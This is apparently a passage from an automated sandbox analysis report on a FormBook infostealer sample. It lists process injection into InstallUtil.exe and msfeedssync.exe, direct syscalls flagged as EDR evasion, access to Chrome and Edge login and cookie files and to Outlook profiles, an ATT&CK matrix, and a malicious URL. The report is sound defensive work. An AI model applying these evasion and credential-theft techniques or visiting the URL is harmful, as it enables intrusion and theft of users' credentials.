Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010A0A5B mov eax, dword ptr fs:[00000030h]	2_2_010A0A5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01096A50 mov eax, dword ptr fs:[00000030h]	2_2_01096A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01096A50 mov eax, dword ptr fs:[00000030h]	2_2_01096A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01096A50 mov eax, dword ptr fs:[00000030h]	2_2_01096A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01096A50 mov eax, dword ptr fs:[00000030h]	2_2_01096A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01096A50 mov eax, dword ptr fs:[00000030h]	2_2_01096A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01096A50 mov eax, dword ptr fs:[00000030h]	2_2_01096A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01096A50 mov eax, dword ptr fs:[00000030h]	2_2_01096A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0110CA72 mov eax, dword ptr fs:[00000030h]	2_2_0110CA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0110CA72 mov eax, dword ptr fs:[00000030h]	2_2_0110CA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010CCA6F mov eax, dword ptr fs:[00000030h]	2_2_010CCA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010CCA6F mov eax, dword ptr fs:[00000030h]	2_2_010CCA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010CCA6F mov eax, dword ptr fs:[00000030h]	2_2_010CCA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0113EA60 mov eax, dword ptr fs:[00000030h]	2_2_0113EA60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0109EA80 mov eax, dword ptr fs:[00000030h]	2_2_0109EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0109EA80 mov eax, dword ptr fs:[00000030h]	2_2_0109EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0109EA80 mov eax, dword ptr fs:[00000030h]	2_2_0109EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0109EA80 mov eax, dword ptr fs:[00000030h]	2_2_0109EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0109EA80 mov eax, dword ptr fs:[00000030h]	2_2_0109EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0109EA80 mov eax, dword ptr fs:[00000030h]	2_2_0109EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0109EA80 mov eax, dword ptr fs:[00000030h]	2_2_0109EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0109EA80 mov eax, dword ptr fs:[00000030h]	2_2_0109EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0109EA80 mov eax, dword ptr fs:[00000030h]	2_2_0109EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01164A80 mov eax, dword ptr fs:[00000030h]	2_2_01164A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010C8A90 mov edx, dword ptr fs:[00000030h]	2_2_010C8A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01098AA0 mov eax, dword ptr fs:[00000030h]	2_2_01098AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01098AA0 mov eax, dword ptr fs:[00000030h]	2_2_01098AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010E6AA4 mov eax, dword ptr fs:[00000030h]	2_2_010E6AA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010E6ACC mov eax, dword ptr fs:[00000030h]	2_2_010E6ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010E6ACC mov eax, dword ptr fs:[00000030h]	2_2_010E6ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010E6ACC mov eax, dword ptr fs:[00000030h]	2_2_010E6ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01090AD0 mov eax, dword ptr fs:[00000030h]	2_2_01090AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010C4AD0 mov eax, dword ptr fs:[00000030h]	2_2_010C4AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010C4AD0 mov eax, dword ptr fs:[00000030h]	2_2_010C4AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010CAAEE mov eax, dword ptr fs:[00000030h]	2_2_010CAAEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010CAAEE mov eax, dword ptr fs:[00000030h]	2_2_010CAAEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01148D10 mov eax, dword ptr fs:[00000030h]	2_2_01148D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01148D10 mov eax, dword ptr fs:[00000030h]	2_2_01148D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010AAD00 mov eax, dword ptr fs:[00000030h]	2_2_010AAD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010AAD00 mov eax, dword ptr fs:[00000030h]	2_2_010AAD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010AAD00 mov eax, dword ptr fs:[00000030h]	2_2_010AAD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010C4D1D mov eax, dword ptr fs:[00000030h]	2_2_010C4D1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01086D10 mov eax, dword ptr fs:[00000030h]	2_2_01086D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01086D10 mov eax, dword ptr fs:[00000030h]	2_2_01086D10

Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\2Stejb80vJ.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe	NtAllocateVirtualMemory: Direct from: 0x77172BFC	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe	NtDelayExecution: Direct from: 0x77172DDC	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe	NtProtectVirtualMemory: Direct from: 0x77167B2E	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe	NtQuerySystemInformation: Direct from: 0x77172DFC	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe	NtReadFile: Direct from: 0x77172ADC	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe	NtQueryInformationProcess: Direct from: 0x77172C26	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe	NtResumeThread: Direct from: 0x77172FBC	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe	NtWriteVirtualMemory: Direct from: 0x7717490C	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe	NtCreateUserProcess: Direct from: 0x7717371C	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe	NtOpenKeyEx: Direct from: 0x77172B9C	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe	NtNotifyChangeKey: Direct from: 0x77173C2C	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe	NtSetInformationProcess: Direct from: 0x77172C5C	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe	NtProtectVirtualMemory: Direct from: 0x77172F9C	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe	NtResumeThread: Direct from: 0x771736AC	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe	NtMapViewOfSection: Direct from: 0x77172D1C	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe	NtWriteVirtualMemory: Direct from: 0x77172E3C	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe	NtCreateMutant: Direct from: 0x771735CC	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe	NtDeviceIoControlFile: Direct from: 0x77172AEC	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe	NtAllocateVirtualMemory: Direct from: 0x77172BEC	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe	NtTerminateThread: Direct from: 0x77172FCC	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe	NtQueryInformationToken: Direct from: 0x77172CAC	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe	NtCreateFile: Direct from: 0x77172FEC	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe	NtOpenFile: Direct from: 0x77172DCC	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe	NtClose: Direct from: 0x77172B6C
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe	NtSetInformationThread: Direct from: 0x771663F9	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe	NtAllocateVirtualMemory: Direct from: 0x77173C9C	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe	NtQueryAttributesFile: Direct from: 0x77172E6C	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe	NtSetInformationThread: Direct from: 0x77172B4C	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe	NtReadVirtualMemory: Direct from: 0x77172E8C	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe	NtCreateKey: Direct from: 0x77172C6C	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe	NtQueryVolumeInformationFile: Direct from: 0x77172F2C	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe	NtAllocateVirtualMemory: Direct from: 0x771748EC	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe	NtQuerySystemInformation: Direct from: 0x771748CC	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe	NtOpenSection: Direct from: 0x77172E0C	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\2Stejb80vJ.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: NULL target: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: NULL target: C:\Windows\SysWOW64\msfeedssync.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: NULL target: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: NULL target: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\msfeedssync.exe

Thread register set: target process: 7164

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\msfeedssync.exe

Thread APC queued: target process: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 977008	Jump to behavior

Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe	Process created: C:\Windows\SysWOW64\msfeedssync.exe "C:\Windows\SysWOW64\msfeedssync.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: UPM8KZRaz30lCAjNcEm6.exe, 00000008.00000002.3725415583.0000000000FA1000.00000002.00000001.00040000.00000000.sdmp, UPM8KZRaz30lCAjNcEm6.exe, 00000008.00000000.1432934936.0000000000FA1000.00000002.00000001.00040000.00000000.sdmp, UPM8KZRaz30lCAjNcEm6.exe, 0000000A.00000000.1580394013.0000000001A51000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: UPM8KZRaz30lCAjNcEm6.exe, 00000008.00000002.3725415583.0000000000FA1000.00000002.00000001.00040000.00000000.sdmp, UPM8KZRaz30lCAjNcEm6.exe, 00000008.00000000.1432934936.0000000000FA1000.00000002.00000001.00040000.00000000.sdmp, UPM8KZRaz30lCAjNcEm6.exe, 0000000A.00000000.1580394013.0000000001A51000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: UPM8KZRaz30lCAjNcEm6.exe, 00000008.00000002.3725415583.0000000000FA1000.00000002.00000001.00040000.00000000.sdmp, UPM8KZRaz30lCAjNcEm6.exe, 00000008.00000000.1432934936.0000000000FA1000.00000002.00000001.00040000.00000000.sdmp, UPM8KZRaz30lCAjNcEm6.exe, 0000000A.00000000.1580394013.0000000001A51000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program ManagerW
Source: UPM8KZRaz30lCAjNcEm6.exe, 00000008.00000002.3725415583.0000000000FA1000.00000002.00000001.00040000.00000000.sdmp, UPM8KZRaz30lCAjNcEm6.exe, 00000008.00000000.1432934936.0000000000FA1000.00000002.00000001.00040000.00000000.sdmp, UPM8KZRaz30lCAjNcEm6.exe, 0000000A.00000000.1580394013.0000000001A51000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Queries volume information: C:\Users\user\Desktop\2Stejb80vJ.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\2Stejb80vJ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1511972245.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3727661903.0000000005840000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3725575572.0000000002860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3725515204.00000000041B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1511179304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3723672280.0000000002470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3724115187.0000000002710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1513679898.0000000003420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\msfeedssync.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\msfeedssync.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1511972245.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3727661903.0000000005840000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3725575572.0000000002860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3725515204.00000000041B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1511179304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3723672280.0000000002470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3724115187.0000000002710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1513679898.0000000003420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	512 Process Injection	3 Virtualization/Sandbox Evasion	1 OS Credential Dumping	221 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	1 Disable or Modify Tools	LSASS Memory	3 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Abuse Elevation Control Mechanism	512 Process Injection	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Abuse Elevation Control Mechanism	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	113 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Source: http://www.askvtwv8.top/uztg/	Avira URL Cloud: Label: malware
